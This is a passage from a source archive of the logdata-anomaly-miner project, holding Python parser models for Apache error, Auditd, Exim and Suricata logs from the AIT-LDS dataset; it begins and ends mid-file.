b"Fatal error: "), AnyByteDataModelElement("error_msg") ]) ]) ]), SequenceModelElement("ah", [ FixedDataModelElement("ah_str", b"] AH"), DecimalIntegerValueModelElement("ah_number", value_pad_type=DecimalIntegerValueModelElement.PAD_TYPE_ZERO), FixedDataModelElement("colon", b": "), AnyByteDataModelElement("msg") ]), SequenceModelElement("script", [ FixedDataModelElement("script_str", b"] script '"), DelimitedDataModelElement("script_path", b"'"), FixedDataModelElement("msg", b"' not found or unable to stat"), OptionalMatchModelElement("referer", SequenceModelElement("referer", [ FixedDataModelElement("referer_str", b", referer: "), AnyByteDataModelElement("referer") ])) ]) ]), ]), SequenceModelElement("notice", [ FixedDataModelElement("ah_str", b"AH"), DecimalIntegerValueModelElement("ah_number", value_pad_type=DecimalIntegerValueModelElement.PAD_TYPE_ZERO), FixedDataModelElement("colon", b": "), AnyByteDataModelElement("msg") ]), SequenceModelElement("end_of_file", [ FixedDataModelElement("end_of_file_str", b"(70014)End of file found: [client "), IpAddressDataModelElement("client_ip"), FixedDataModelElement("colon", b":"), DecimalIntegerValueModelElement("port"), FixedDataModelElement("error_msg", b"] AH01102: error reading status line from remote server "), DelimitedDataModelElement("domain", b":"), FixedDataModelElement("colon", b":"), DecimalIntegerValueModelElement("remote_port") ]) ]) ]), SequenceModelElement("bash", [ FixedDataModelElement("bash", b"bash: "), AnyByteDataModelElement("error_msg") ]) ]) return model logdata-anomaly-miner-2.6.1/source/root/etc/aminer/conf-available/ait-lds/AuditdParsingModel.py000066400000000000000000000531151437606560100325200ustar00rootroot00000000000000"""This module defines a generated parser model.""" from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement def get_model(): """Return a model to parse Audit logs from the AIT-LDS.""" alphabet = b"!'#$%&\"()*+,-./0123456789:;<>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ\\^_`abcdefghijklmnopqrstuvwxyz{|}~=[]" seq = [ FixedDataModelElement("audit_str", b"audit("), DateTimeModelElement("time", b"%s.%f"), FixedDataModelElement("colon_str", b":"), DecimalIntegerValueModelElement("id"), FixedDataModelElement("pid_str", b"): pid="), VariableByteDataModelElement("pid", alphabet), FixedDataModelElement("uid_str", b" uid="), VariableByteDataModelElement("uid", alphabet), FixedDataModelElement("auid_str", b" auid="), VariableByteDataModelElement("auid", alphabet), FixedDataModelElement("ses_str", b" ses="), VariableByteDataModelElement("ses", alphabet), FixedDataModelElement("msg2_str", b" msg="), VariableByteDataModelElement("msg2", alphabet), FirstMatchModelElement("fm", [ SequenceModelElement("acct", [ FixedDataModelElement("acct_str", b" acct="), VariableByteDataModelElement("acct", alphabet)]), SequenceModelElement("comm", [ FixedDataModelElement("comm_str", b" comm="), VariableByteDataModelElement("comm", alphabet)]), SequenceModelElement("id", [ FixedDataModelElement("id_str", b" id="), VariableByteDataModelElement("id", alphabet)]), SequenceModelElement("cmd", [ FixedDataModelElement("cmd_str", b" cmd="), VariableByteDataModelElement("cmd", alphabet)])]), OptionalMatchModelElement( "opt", SequenceModelElement("opt_seq", [ FixedDataModelElement("exe_str", b" exe="), VariableByteDataModelElement("exe", alphabet), FixedDataModelElement("hostname_str", b" hostname="), VariableByteDataModelElement("hostname", alphabet), FixedDataModelElement("addr_str", b" addr="), VariableByteDataModelElement("addr", alphabet)])), FixedDataModelElement("terminal_str", b" terminal="), VariableByteDataModelElement("terminal", alphabet), FixedDataModelElement("res_str", b" res="), VariableByteDataModelElement("res", alphabet)] model = SequenceModelElement("model", [ FixedDataModelElement("type_str", b"type="), FirstMatchModelElement("type", [ SequenceModelElement("execve", [ FixedDataModelElement("execve_str", b"EXECVE msg=audit("), DateTimeModelElement("time", b"%s.%f"), FixedDataModelElement("colon_str", b":"), DecimalIntegerValueModelElement("id"), FixedDataModelElement("argc_str", b"): argc="), DecimalIntegerValueModelElement("argc", value_sign_type=DecimalIntegerValueModelElement.SIGN_TYPE_OPTIONAL), FixedDataModelElement("a0_str", b" a0="), VariableByteDataModelElement("a0", alphabet), OptionalMatchModelElement( "opt1", SequenceModelElement("seq1", [ FixedDataModelElement("a1_str", b" a1="), VariableByteDataModelElement("a1", alphabet), OptionalMatchModelElement( "opt2", SequenceModelElement("seq2", [ FixedDataModelElement("a2_str", b" a2="), VariableByteDataModelElement("a2", alphabet), OptionalMatchModelElement( "opt3", SequenceModelElement("seq3", [ FixedDataModelElement("a3_str", b" a3="), VariableByteDataModelElement("a3", alphabet), OptionalMatchModelElement( "opt4", SequenceModelElement("seq4", [ FixedDataModelElement("a4_str", b" a4="), VariableByteDataModelElement("a4", alphabet) ]) ), OptionalMatchModelElement( "opt5", SequenceModelElement("seq5", [ FixedDataModelElement("a5_str", b" a5="), VariableByteDataModelElement("a5", alphabet) ]) ), OptionalMatchModelElement( "opt6", SequenceModelElement("seq6", [ FixedDataModelElement("a6_str", b" a6="), VariableByteDataModelElement("a6", alphabet) ]) ), OptionalMatchModelElement( "opt7", SequenceModelElement("seq7", [ FixedDataModelElement("a7_str", b" a7="), VariableByteDataModelElement("a7", alphabet) ]) ), OptionalMatchModelElement( "opt8", SequenceModelElement("seq8", [ FixedDataModelElement("a8_str", b" a8="), VariableByteDataModelElement("a8", alphabet) ]) ), OptionalMatchModelElement( "opt9", SequenceModelElement("seq9", [ FixedDataModelElement("a9_str", b" a9="), VariableByteDataModelElement("a9", alphabet) ]) ), OptionalMatchModelElement( "opt10", SequenceModelElement("seq10", [ FixedDataModelElement("a10_str", b" a10="), VariableByteDataModelElement("a10", alphabet) ]) ), OptionalMatchModelElement( "opt11", SequenceModelElement("seq11", [ FixedDataModelElement("a11_str", b" a11="), VariableByteDataModelElement("a11", alphabet) ]) ), OptionalMatchModelElement( "opt12", SequenceModelElement("seq12", [ FixedDataModelElement("a12_str", b" a12="), VariableByteDataModelElement("a12", alphabet) ]) ), OptionalMatchModelElement( "opt13", SequenceModelElement("seq13", [ FixedDataModelElement("a13_str", b" a13="), VariableByteDataModelElement("a13", alphabet) ]) ), OptionalMatchModelElement( "opt14", SequenceModelElement("seq14", [ FixedDataModelElement("a14_str", b" a14="), VariableByteDataModelElement("a14", alphabet) ]) )]))]))]))]), SequenceModelElement("proctitle", [ FixedDataModelElement("type_str", b"PROCTITLE msg=audit("), DateTimeModelElement("time", b"%s.%f"), FixedDataModelElement("colon_str", b":"), DecimalIntegerValueModelElement("id"), FixedDataModelElement("proctitle_str", b"): proctitle="), VariableByteDataModelElement("proctitle", alphabet)]), SequenceModelElement("syscall", [ FixedDataModelElement("msg_str", b"SYSCALL msg=audit("), DateTimeModelElement("time", b"%s.%f"), FixedDataModelElement("colon_str", b":"), DecimalIntegerValueModelElement("id"), FixedDataModelElement("arch_str", b"): arch="), VariableByteDataModelElement("arch", alphabet), FixedDataModelElement("syscall_str", b" syscall="), DecimalIntegerValueModelElement("syscall", value_sign_type=DecimalIntegerValueModelElement.SIGN_TYPE_OPTIONAL), FixedDataModelElement("success_str", b" success="), VariableByteDataModelElement("success", alphabet), FixedDataModelElement("exit_str", b" exit="), VariableByteDataModelElement("exit", alphabet), FixedDataModelElement("a0_str", b" a0="), VariableByteDataModelElement("a0", alphabet), FixedDataModelElement("a1_str", b" a1="), VariableByteDataModelElement("a1", alphabet), FixedDataModelElement("a2_str", b" a2="), VariableByteDataModelElement("a2", alphabet), FixedDataModelElement("a3_str", b" a3="), VariableByteDataModelElement("a3", alphabet), FixedDataModelElement("items_str", b" items="), VariableByteDataModelElement("items", alphabet), FixedDataModelElement("ppid_str", b" ppid="), VariableByteDataModelElement("ppid", alphabet), FixedDataModelElement("pid_str", b" pid="), VariableByteDataModelElement("pid", alphabet), FixedDataModelElement("auid_str", b" auid="), VariableByteDataModelElement("auid", alphabet), FixedDataModelElement("uid_str", b" uid="), VariableByteDataModelElement("uid", alphabet), FixedDataModelElement("gid_str", b" gid="), VariableByteDataModelElement("gid", alphabet), FixedDataModelElement("euid_str", b" euid="), VariableByteDataModelElement("euid", alphabet), FixedDataModelElement("suid_str", b" suid="), VariableByteDataModelElement("suid", alphabet), FixedDataModelElement("fsuid_str", b" fsuid="), VariableByteDataModelElement("fsuid", alphabet), FixedDataModelElement("egid_str", b" egid="), VariableByteDataModelElement("egid", alphabet), FixedDataModelElement("sgid_str", b" sgid="), VariableByteDataModelElement("sgid", alphabet), FixedDataModelElement("fsgid_str", b" fsgid="), VariableByteDataModelElement("fsgid", alphabet), FixedDataModelElement("tty_str", b" tty="), VariableByteDataModelElement("tty", alphabet), FixedDataModelElement("ses_str", b" ses="), VariableByteDataModelElement("ses", alphabet), FixedDataModelElement("comm_str", b" comm="), VariableByteDataModelElement("comm", alphabet), FixedDataModelElement("exe_str", b" exe="), VariableByteDataModelElement("exe", alphabet), FixedDataModelElement("key_str", b" key="), VariableByteDataModelElement("key", alphabet)]), SequenceModelElement("path", [ FixedDataModelElement("msg_str", b"PATH msg=audit("), DateTimeModelElement("time", b"%s.%f"), FixedDataModelElement("colon_str", b":"), DecimalIntegerValueModelElement("id"), FixedDataModelElement("item_str", b"): item="), DecimalIntegerValueModelElement("item", value_sign_type=DecimalIntegerValueModelElement.SIGN_TYPE_OPTIONAL), FixedDataModelElement("name_str", b" name="), VariableByteDataModelElement("name", alphabet), FirstMatchModelElement("path", [ SequenceModelElement("nametype", [ FixedDataModelElement("nametype_str", b" nametype="), VariableByteDataModelElement("nametype", alphabet)]), SequenceModelElement("inode", [ FixedDataModelElement("inode_str", b" inode="), DecimalIntegerValueModelElement("inode", value_sign_type=DecimalIntegerValueModelElement.SIGN_TYPE_OPTIONAL), FixedDataModelElement("dev_str", b" dev="), VariableByteDataModelElement("dev", alphabet), FixedDataModelElement("mode_str", b" mode="), VariableByteDataModelElement("mode", alphabet), FixedDataModelElement("ouid_str", b" ouid="), VariableByteDataModelElement("ouid", alphabet), FixedDataModelElement("ogid_str", b" ogid="), VariableByteDataModelElement("ogid", alphabet), FixedDataModelElement("rdev_str", b" rdev="), VariableByteDataModelElement("rdev", alphabet), FixedDataModelElement("nametype_str", b" nametype="), VariableByteDataModelElement("nametype", alphabet)])])]), SequenceModelElement("login", [ FixedDataModelElement("msg1_str", b"LOGIN msg=audit("), DateTimeModelElement("time", b"%s.%f"), FixedDataModelElement("colon_str", b":"), DecimalIntegerValueModelElement("id"), FixedDataModelElement("pid_str", b"): pid="), VariableByteDataModelElement("pid", alphabet), FixedDataModelElement("uid_str", b" uid="), VariableByteDataModelElement("uid", alphabet), FixedDataModelElement("old_auid_str", b" old-auid="), VariableByteDataModelElement("old_auid", alphabet), FixedDataModelElement("auid_str", b" auid="), VariableByteDataModelElement("auid", alphabet), OptionalMatchModelElement( "tty", SequenceModelElement("tty", [ FixedDataModelElement("tty_str", b" tty="), VariableByteDataModelElement("tty", alphabet)])), FixedDataModelElement("old_ses_str", b" old-ses="), VariableByteDataModelElement("old_ses", alphabet), FixedDataModelElement("ses_str", b" ses="), VariableByteDataModelElement("ses", alphabet), FixedDataModelElement("res_str", b" res="), VariableByteDataModelElement("res", alphabet)]), SequenceModelElement("sockaddr", [ FixedDataModelElement("msg_str", b"SOCKADDR msg=audit("), DateTimeModelElement("time", b"%s.%f"), FixedDataModelElement("colon_str", b":"), DecimalIntegerValueModelElement("id"), FixedDataModelElement("saddr_str", b"): saddr="), VariableByteDataModelElement("saddr", alphabet)]), SequenceModelElement("unknown", [ FixedDataModelElement("unknwon_str", b"UNKNOWN["), DecimalIntegerValueModelElement("unknown_id", value_sign_type=DecimalIntegerValueModelElement.SIGN_TYPE_OPTIONAL), FixedDataModelElement("msg_str", b"] msg=audit("), DateTimeModelElement("time", b"%s.%f"), FixedDataModelElement("colon_str", b":"), DecimalIntegerValueModelElement("id"), FixedDataModelElement("proctitle_str", b"): proctitle="), VariableByteDataModelElement("proctitle", alphabet)]), SequenceModelElement("cred_refr", [ FixedDataModelElement("msg1_str", b"CRED_REFR msg=")] + seq), SequenceModelElement("user_start", [ FixedDataModelElement("msg1_str", b"USER_START msg=")] + seq), SequenceModelElement("user_acct", [ FixedDataModelElement("msg1_str", b"USER_ACCT msg=")] + seq), SequenceModelElement("user_auth", [ FixedDataModelElement("msg1_str", b"USER_AUTH msg=")] + seq), SequenceModelElement("user_login", [ FixedDataModelElement("msg1_str", b"USER_LOGIN msg=")] + seq), SequenceModelElement("cred_disp", [ FixedDataModelElement("msg1_str", b"CRED_DISP msg=")] + seq), SequenceModelElement("service_start", [ FixedDataModelElement("msg1_str", b"SERVICE_START msg=")] + seq), SequenceModelElement("service_stop", [ FixedDataModelElement("msg1_str", b"SERVICE_STOP msg=")] + seq), SequenceModelElement("user_end", [ FixedDataModelElement("msg1_str", b"USER_END msg=")] + seq), SequenceModelElement("user_cmd", [ FixedDataModelElement("msg1_str", b"USER_CMD msg=")] + seq), SequenceModelElement("cred_acq", [ FixedDataModelElement("msg1_str", b"CRED_ACQ msg=")] + seq), SequenceModelElement("avc", [ FixedDataModelElement("abc_str", b"AVC msg=audit("), DateTimeModelElement("time", b"%s.%f"), FixedDataModelElement("colon_str", b":"), DecimalIntegerValueModelElement("id"), FixedDataModelElement("apparmor_str", b"): apparmor=\""), DelimitedDataModelElement("apparmor", b"\""), FixedDataModelElement("operation_str", b"\" operation=\""), DelimitedDataModelElement("operation", b"\""), OptionalMatchModelElement( "opt", SequenceModelElement("seq", [ FixedDataModelElement("info_str", b"\" info=\""), DelimitedDataModelElement("info", b"\"")])), FixedDataModelElement("profile_str", b"\" profile=\""), DelimitedDataModelElement("profile", b"\""), FixedDataModelElement("name_str", b"\" name=\""), DelimitedDataModelElement("name", b"\""), FixedDataModelElement("pid_str", b"\" pid="), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("comm_str", b" comm=\""), DelimitedDataModelElement("comm", b"\""), FixedDataModelElement("quote", b"\"")]), SequenceModelElement("user_bprm_fcaps", [ FixedDataModelElement("msg1_str", b"BPRM_FCAPS msg=audit("), DateTimeModelElement("time", b"%s.%f"), FixedDataModelElement("colon_str", b":"), DecimalIntegerValueModelElement("id"), FixedDataModelElement("fver_str", b"): fver="), VariableByteDataModelElement("fver", alphabet), FixedDataModelElement("fp_str", b" fp="), VariableByteDataModelElement("fp", alphabet), FixedDataModelElement("fi_str", b" fi="), VariableByteDataModelElement("fi", alphabet), FixedDataModelElement("fe_str", b" fe="), VariableByteDataModelElement("fe", alphabet), FixedDataModelElement("old_pp_str", b" old_pp="), VariableByteDataModelElement("old_pp", alphabet), FixedDataModelElement("old_pi_str", b" old_pi="), VariableByteDataModelElement("old_pi", alphabet), FixedDataModelElement("old_pe_str", b" old_pe="), VariableByteDataModelElement("old_pe", alphabet), FixedDataModelElement("new_pp_str", b" new_pp="), VariableByteDataModelElement("new_pp", alphabet), FixedDataModelElement("new_pi_str", b" new_pi="), VariableByteDataModelElement("new_pi", alphabet), FixedDataModelElement("new_pe_str", b" new_pe="), VariableByteDataModelElement("new_pe", alphabet)])])]) return model logdata-anomaly-miner-2.6.1/source/root/etc/aminer/conf-available/ait-lds/EximParsingModel.py000066400000000000000000000227561437606560100322170ustar00rootroot00000000000000"""This module defines a parser model for exim.""" from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement def get_model(): """Return a model to parse Exim logs from the AIT-LDS.""" alphabet = b"!'#$%&\"()*+,-./0123456789:;<>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ\\^_`abcdefghijklmnopqrstuvwxyz{|}~=[]" model = SequenceModelElement("model", [ DateTimeModelElement("time", b"%Y-%m-%d %H:%M:%S"), FixedDataModelElement("sp", b" "), FirstMatchModelElement("fm", [ SequenceModelElement("start", [ FixedDataModelElement("start", b"Start queue run: pid="), DecimalIntegerValueModelElement("pid"), ]), SequenceModelElement("start", [ FixedDataModelElement("start", b"TLS error"), AnyByteDataModelElement('remainder') ]), SequenceModelElement("end", [ FixedDataModelElement("end", b"End queue run: pid="), DecimalIntegerValueModelElement("pid"), ]), SequenceModelElement("no_host_found", [ FixedDataModelElement("no_host_found_str", b"no host name found for IP address "), IpAddressDataModelElement("ip"), ]), SequenceModelElement("start_daemon", [ FixedDataModelElement("start_daemon_str", b"exim "), DelimitedDataModelElement("version", b" "), FixedDataModelElement("start_deamon_str2", b" daemon started"), AnyByteDataModelElement("msg") ]), SequenceModelElement("vrfy_failed", [ FixedDataModelElement("vrfy_failed_str", b"VRFY failed for "), DelimitedDataModelElement("mail", b" "), FixedDataModelElement("h_str", b" H="), DelimitedDataModelElement("h", b" "), FixedDataModelElement("sp1", b" ["), IpAddressDataModelElement("ip"), FixedDataModelElement("sp2", b"]") ]), SequenceModelElement("end", [ DelimitedDataModelElement("spool", b" "), FixedDataModelElement("spool_file_locked", b" Spool file is locked (another process is handling this message)") ]), SequenceModelElement("mail", [ DelimitedDataModelElement("id", b" "), FirstMatchModelElement("dir", [ SequenceModelElement("dir_in", [ FixedDataModelElement("in", b" <= "), FirstMatchModelElement("fm", [ SequenceModelElement("seq1", [ FixedDataModelElement("brack", b"<> "), FirstMatchModelElement("fm", [ SequenceModelElement("r", [ FixedDataModelElement("r_str", b"R="), DelimitedDataModelElement("r", b" "), FixedDataModelElement("u_str", b" U="), DelimitedDataModelElement("u", b" "), ]), SequenceModelElement("h", [ FixedDataModelElement("h_str", b"H="), DelimitedDataModelElement("h", b" "), FixedDataModelElement("sp1", b" ["), IpAddressDataModelElement("ip"), FixedDataModelElement("sp1", b"]"), ]) ]), FixedDataModelElement("sp2", b" P="), DelimitedDataModelElement("p", b" "), FixedDataModelElement("sp2", b" S="), DecimalIntegerValueModelElement("s"), ]), SequenceModelElement("seq2", [ DelimitedDataModelElement("mail", b" "), FixedDataModelElement("user_str", b" U="), DelimitedDataModelElement("user", b" "), FixedDataModelElement("p_str", b" P="), DelimitedDataModelElement("p", b" "), FixedDataModelElement("s_str", b" S="), DecimalIntegerValueModelElement("s"), OptionalMatchModelElement( "id", SequenceModelElement("id", [ FixedDataModelElement("id_str", b" id="), AnyByteDataModelElement("id") ]) ) ]), AnyByteDataModelElement('remainder') ]) ]), SequenceModelElement("dir_out", [ FixedDataModelElement("in", b" => "), DelimitedDataModelElement("name", b" "), FirstMatchModelElement('fm', [ SequenceModelElement('seq', [ FixedDataModelElement("sp1", b" "), OptionalMatchModelElement( "mail_opt", SequenceModelElement( "mail", [ FixedDataModelElement("brack1", b"("), DelimitedDataModelElement("brack_mail", b")"), FixedDataModelElement("brack2", b") "), ]) ), OptionalMatchModelElement( "opt", SequenceModelElement( "seq", [ FixedDataModelElement("sp2", b"<"), DelimitedDataModelElement("mail", b">"), FixedDataModelElement("closing_brack", b"> "), ]) ), FixedDataModelElement("r_str", b"R="), DelimitedDataModelElement("r", b" "), FixedDataModelElement("t_str", b" T="), VariableByteDataModelElement("t", alphabet), OptionalMatchModelElement( "param_opt", SequenceModelElement( "seq", [ FixedDataModelElement("h_str", b" H="), DelimitedDataModelElement("h", b" X="), FixedDataModelElement("x_str", b" X="), DelimitedDataModelElement("x", b" CV="), FixedDataModelElement("cv_str", b" CV="), DelimitedDataModelElement("cv", b" DN="), FixedDataModelElement("dn_str", b" DN="), DelimitedDataModelElement("dn", b" C="), AnyByteDataModelElement("c"), ])) ]), ]) ]), SequenceModelElement("aster", [ FixedDataModelElement("aster", b" ** "), DelimitedDataModelElement("command", b" "), FixedDataModelElement("headers_str", b' Too many "Received" headers - suspected mail loop')]), SequenceModelElement("prdr", [ FixedDataModelElement("prdr", b" PRDR "), AnyByteDataModelElement('remainder')]), SequenceModelElement("arrw", [ FixedDataModelElement("arrw", b" -> "), AnyByteDataModelElement('remainder')]), FixedDataModelElement("completed", b" Completed"), FixedDataModelElement("frozen", b" Message is frozen"), FixedDataModelElement("frozen", b" Frozen (delivery error message)") ]) ])])]) return model SuricataEventParsingModel.py000066400000000000000000001031421437606560100340000ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/etc/aminer/conf-available/ait-lds"""This module defines a generated parser model.""" from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.HexStringModelElement import HexStringModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement def get_model(): """Return a model to parse Suricata Event logs from the AIT-LDS.""" conn = SequenceModelElement("conn", [ FixedDataModelElement("src_ip_str", b'"src_ip":"'), FirstMatchModelElement("ip", [ SequenceModelElement("ipv4", [ IpAddressDataModelElement("src_ip"), FixedDataModelElement("src_port_str", b'","src_port":'), DecimalIntegerValueModelElement("src_port"), FixedDataModelElement("dest_ip_str", b',"dest_ip":"'), IpAddressDataModelElement("dest_ip"), FixedDataModelElement("dest_port_str", b'","dest_port":'), DecimalIntegerValueModelElement("dest_port"), FixedDataModelElement("proto_str", b',"proto":"'), DelimitedDataModelElement("proto", b'"'), FixedDataModelElement("quote", b'"') ]), SequenceModelElement("ipv6", [ DelimitedDataModelElement("src_ip", b'"'), FixedDataModelElement("dest_ip_str", b'","dest_ip":"'), DelimitedDataModelElement("dest_ip", b'"'), FixedDataModelElement("proto_str", b'","proto":"'), DelimitedDataModelElement("proto", b'"'), FixedDataModelElement("icmp_type_str", b'","icmp_type":'), DecimalIntegerValueModelElement("icmp_type"), FixedDataModelElement("icmp_code_str", b',"icmp_code":'), DecimalIntegerValueModelElement("icmp_code"), ]), ]) ]) http = SequenceModelElement("http", [ FixedDataModelElement("hostname_str", b',"http":{"hostname":"'), DelimitedDataModelElement("hostname", b'"'), FixedDataModelElement("url_str", b'","url":"'), DelimitedDataModelElement("url", b'"', escape=b"\\"), FixedDataModelElement("http_user_agent_str", b'","http_user_agent":"'), DelimitedDataModelElement("http_user_agent", b'"'), OptionalMatchModelElement( "content_type", SequenceModelElement("content_type", [ FixedDataModelElement("http_content_type_str", b'","http_content_type":"'), DelimitedDataModelElement("http_content_type", b'"'), ])), OptionalMatchModelElement( "http_refer", SequenceModelElement("http_refer", [ FixedDataModelElement("http_refer_str", b'","http_refer":"'), DelimitedDataModelElement("http_refer", b'"'), ])), FixedDataModelElement("http_method_str", b'","http_method":"'), DelimitedDataModelElement("http_method", b'"'), FixedDataModelElement("protocol_str", b'","protocol":"'), DelimitedDataModelElement("protocol", b'"'), FixedDataModelElement("quote_str", b'"'), OptionalMatchModelElement( "status", SequenceModelElement("status", [ FixedDataModelElement("status_str", b',"status":'), DecimalIntegerValueModelElement("status"), ])), OptionalMatchModelElement( "redirect", SequenceModelElement("redirect", [ FixedDataModelElement("redirect_str", b',"redirect":"'), DelimitedDataModelElement("redirect", b'"'), FixedDataModelElement("quote_str", b'"') ])), FixedDataModelElement("length_str", b',"length":'), DecimalIntegerValueModelElement("length"), FixedDataModelElement("brack_str", b"}") ]) model = SequenceModelElement("model", [ FixedDataModelElement("time_str", b'{"timestamp":"'), DateTimeModelElement("time", b"%Y-%m-%dT%H:%M:%S.%f%z"), FixedDataModelElement("comma_str", b'",'), OptionalMatchModelElement( "flow_id", SequenceModelElement("flow_id", [ FixedDataModelElement("flow_id_str", b'"flow_id":'), DecimalIntegerValueModelElement("flow_id"), FixedDataModelElement("comma_str", b",")])), OptionalMatchModelElement( "in_iface", SequenceModelElement("in_iface", [ FixedDataModelElement("in_iface_str", b'"in_iface":"'), DelimitedDataModelElement("in_iface", b'"'), FixedDataModelElement("comma_str", b'",')])), FixedDataModelElement("event_type_str", b'"event_type":"'), FirstMatchModelElement("event_type", [ SequenceModelElement("dns", [ FixedDataModelElement("dns_str", b'dns",'), conn, SequenceModelElement("dns", [ FixedDataModelElement("type_str", b',"dns":{"type":"'), DelimitedDataModelElement("type", b'"'), FixedDataModelElement("id_str", b'","id":'), DecimalIntegerValueModelElement("id"), OptionalMatchModelElement( "rcode", SequenceModelElement("rcode", [ FixedDataModelElement("rcode_str", b',"rcode":"'), DelimitedDataModelElement("rcode", b'"'), FixedDataModelElement("quote_str", b'"')])), FixedDataModelElement("rrname_str", b',"rrname":"'), DelimitedDataModelElement("rrname", b'"'), OptionalMatchModelElement("rrtype", SequenceModelElement("rrtype", [ FixedDataModelElement("rrtype_str", b'","rrtype":"'), DelimitedDataModelElement("rrtype", b'"')])), FixedDataModelElement("quote", b'"'), OptionalMatchModelElement( "tx_id", SequenceModelElement("tx_id", [ FixedDataModelElement("tx_id_str", b',"tx_id":'), DecimalIntegerValueModelElement("tx_id")])), OptionalMatchModelElement("ttl", SequenceModelElement("ttl", [ FixedDataModelElement("ttl_str", b',"ttl":'), DecimalIntegerValueModelElement("ttl")])), OptionalMatchModelElement( "rdata", SequenceModelElement("rdata", [ FixedDataModelElement("rdata_str", b',"rdata":"'), DelimitedDataModelElement("rdata", b'"'), FixedDataModelElement("quote_str", b'"')])), FixedDataModelElement("brack_str", b"}}") ]), ]), SequenceModelElement("flow", [ FixedDataModelElement("flow_str", b'flow",'), conn, OptionalMatchModelElement( "app_proto", SequenceModelElement("app_proto", [ FixedDataModelElement("app_proto_str", b',"app_proto":"'), DelimitedDataModelElement("app_proto", b'"'), FixedDataModelElement("quote_str", b'"') ]) ), OptionalMatchModelElement( "app_proto_tc", SequenceModelElement("app_proto_tc", [ FixedDataModelElement("app_proto_tc_str", b',"app_proto_tc":"'), DelimitedDataModelElement("app_proto_tc", b'"'), FixedDataModelElement("quote_str", b'"') ]) ), SequenceModelElement("flow", [ FixedDataModelElement("pkts_toserver_str", b',"flow":{"pkts_toserver":'), DecimalIntegerValueModelElement("pkts_toserver"), FixedDataModelElement("pkts_toclient_str", b',"pkts_toclient":'), DecimalIntegerValueModelElement("pkts_toclient"), FixedDataModelElement("bytes_toserver_str", b',"bytes_toserver":'), DecimalIntegerValueModelElement("bytes_toserver"), FixedDataModelElement("bytes_toclient_str", b',"bytes_toclient":'), DecimalIntegerValueModelElement("bytes_toclient"), FixedDataModelElement("start_str", b',"start":"'), DelimitedDataModelElement("start", b'"'), FixedDataModelElement("end_str", b'","end":"'), DelimitedDataModelElement("end", b'"'), FixedDataModelElement("age_str", b'","age":'), DecimalIntegerValueModelElement("age"), FixedDataModelElement("state_str", b',"state":"'), DelimitedDataModelElement("state", b'"'), FixedDataModelElement("reason_str", b'","reason":"'), DelimitedDataModelElement("reason", b'"'), FixedDataModelElement("alerted_str", b'","alerted":'), FixedWordlistDataModelElement("alerted", [b"true", b"false"]), FixedDataModelElement("brack_str1", b"}"), OptionalMatchModelElement( "tcp", SequenceModelElement("tcp", [ FixedDataModelElement("tcp_flags_str", b',"tcp":{"tcp_flags":"'), HexStringModelElement("tcp_flags"), FixedDataModelElement("tcp_flags_ts_str", b'","tcp_flags_ts":"'), HexStringModelElement("tcp_flags_ts"), FixedDataModelElement("tcp_flags_tc_str", b'","tcp_flags_tc":"'), HexStringModelElement("tcp_flags_tc"), OptionalMatchModelElement( "flags", SequenceModelElement("flags", [ FixedDataModelElement("syn_str", b'","syn":'), FixedWordlistDataModelElement("syn", [b"true", b"false"]), OptionalMatchModelElement( "fin", SequenceModelElement("fin", [ FixedDataModelElement("fin_str", b',"fin":'), FixedWordlistDataModelElement("fin", [b"true", b"false"]), ]) ), OptionalMatchModelElement( "rst", SequenceModelElement("rst", [ FixedDataModelElement("rst_str", b',"rst":'), FixedWordlistDataModelElement("rst", [b"true", b"false"]), ]) ), OptionalMatchModelElement( "psh", SequenceModelElement("psh", [ FixedDataModelElement("psh_str", b',"psh":'), FixedWordlistDataModelElement("psh", [b"true", b"false"]), ]) ), FixedDataModelElement("ack_str", b',"ack":'), FixedWordlistDataModelElement("ack", [b"true", b"false"]), FixedDataModelElement("tcp_state_str", b',"state":"'), DelimitedDataModelElement("tcp_state", b'"'), ]) ), FixedDataModelElement("tcp_brack_str", b'"}'), ]) ), FixedDataModelElement("brack_str2", b"}") ]), ]), SequenceModelElement("http", [ FixedDataModelElement("http_str", b'http",'), conn, FixedDataModelElement("tx_id_str", b',"tx_id":'), DecimalIntegerValueModelElement("tx_id"), http, FixedDataModelElement("brack_str", b"}") ]), SequenceModelElement("fileinfo", [ FixedDataModelElement("fileinfo_str", b'fileinfo",'), conn, http, FixedDataModelElement("app_proto_str", b',"app_proto":"'), DelimitedDataModelElement("app_proto", b'"'), SequenceModelElement("fileinfo", [ FixedDataModelElement("fileinfo_str", b'","fileinfo":{'), OptionalMatchModelElement( "filename", SequenceModelElement("filename", [ FixedDataModelElement("filename_str", b'"filename":"'), DelimitedDataModelElement("filename", b'"'), FixedDataModelElement("quote_str", b'",') ]) ), FixedDataModelElement("state_str", 